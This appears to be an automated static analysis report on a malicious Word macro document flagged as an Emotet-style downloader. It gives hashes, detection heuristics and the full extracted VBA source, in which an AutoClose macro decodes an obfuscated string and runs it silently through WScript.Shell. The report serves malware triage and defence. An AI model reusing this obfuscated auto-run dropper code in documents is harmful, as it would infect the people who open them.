Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ebf4d1f9396d6ab1…

MALICIOUS

Office (OOXML)

Size: 36.3 KB
Created: 2017-10-25 18:34:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2020-02-04
MD5: b0d0b281554f8fbe9f6af749a0bd9239
SHA-1: 5be7b445857ba4091ca81b768dba7e09698fce76
SHA-256: ebf4d1f9396d6ab1aff5b3cc6c8e682e1291c49bbbe51ac5c797dc252833909f
Risk Score: 352

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample is an OOXML document containing VBA macros. The AutoClose macro triggers the execution of a WScript.Shell object, which is used to run a command. This command is constructed from a heavily obfuscated string within the VBA code, likely a URL or command to download and execute a secondary payload. The presence of WScript.Shell and Auto_Close macros strongly indicates a malicious intent to execute arbitrary code.

Heuristics 9

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
      If Len(melis) >= 19 Then
        Call CreateObject("WScript.Shell").Run(melis, vbHide)
      End If
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(melis) >= 19 Then
        Call CreateObject("WScript.Shell").Run(melis, vbHide)
      End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(melis) >= 19 Then
        Call CreateObject("WScript.Shell").Run(melis, vbHide)
      End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
     Call Application.Run("calibro", svizzera("0621271226033312090915224821203431021522203412251505420607030315224521010107510415184812272238475012250215394203021201534812025319124745093112510214534321275109210704163109121813330202061040400706504724500703042412121212532521014046354002262151475306422513111536125129103237374332303215281513414635490223090217531234121314001539020726022237262125120303153612512910323737433230321341463549022309021753123412130015184812272238475012250215394203021201534812025 …
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2496 bytes
SHA-256: b0f1aae9b349bc8a9dfd17f503fe3cb8c1c552e36c732e01be33440af688c5b9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function riportare(forbito As Integer) As String
 sportivo = Array(";", "m", "t", "s", "d", "B", "p", "a", "?", "l", ":", ",", "e", "'", ")", " ", "F", "Z", "(", "W", "E", "o", "-", "f", "q", "c", "r", "w", "+", "v", "T", "i", "A", "h", "x", "L", "$", "P", "O", "S", "/", "\", "y", "D", "=", "C", "X", "b", "N", "z", "j", "n", "g", ".")
 Dim svolta As Integer
 
 For svolta = LBound(sportivo) To UBound(sportivo)
   If svolta = forbito Then
    riportare = sportivo(svolta)
   End If
 Next
 
End Function


Public Function calibro(melis As String)
  If Len(melis) >= 19 Then
    Call CreateObject("WScript.Shell").Run(melis, vbHide)
  End If
End Function

Sub AutoClose()
 Call Application.Run("calibro", svizzera("0621271226033312090915224821203431021522203412251505420607030315224521010107510415184812272238475012250215394203021201534812025319124745093112510214534321275109210704163109121813330202061040400706504724500703042412121212532521014046354002262151475306422513111536125129103237374332303215281513414635490223090217531234121314001539020726022237262125120303153612512910323737433230321341463549022309021753123412130015184812272238475012250215394203021201534812025319124745093112510214534321275109210704390226315152181333020206104040070650472450070304241212121253252101400353063306083104440226215147131400"))
End Sub

Function buio(ByVal snodo As String, ByVal sembrare As String)
 oggetto = ""
 
 roditore = Array(snodo, sembrare)
 For asettico = 0 To UBound(roditore)
   oggetto = oggetto & "" & roditore(asettico)
 Next
 
 buio = oggetto
End Function

Function svizzera(Optional afoso As String, Optional afoso2)
  sintesi = lacuna(Trim(afoso))
  atavico = ""

  For svolta = 0 To Len(afoso)
    If (svolta + 1) <= UBound(sintesi) Then
    abrogato = sintesi(svolta)
    famiglia = riportare(Int(abrogato + sintesi(svolta + 1)))
    atavico = buio(atavico, famiglia)
    svolta = svolta + 1
    End If
  Next
  
  svizzera = atavico
End Function


Function lacuna(ovocito As String, Optional sposo As Integer) As Variant
    lacuna = Split(Left(StrConv(ovocito, vbUnicode), Len(StrConv(ovocito, vbUnicode)) - 1), vbNullChar)
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 12288 bytes
SHA-256: ae4b8e8efe3ea24fb8562c8991ce3b6ef6868bcabef5cad60e43ad0fe42e4fd3
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).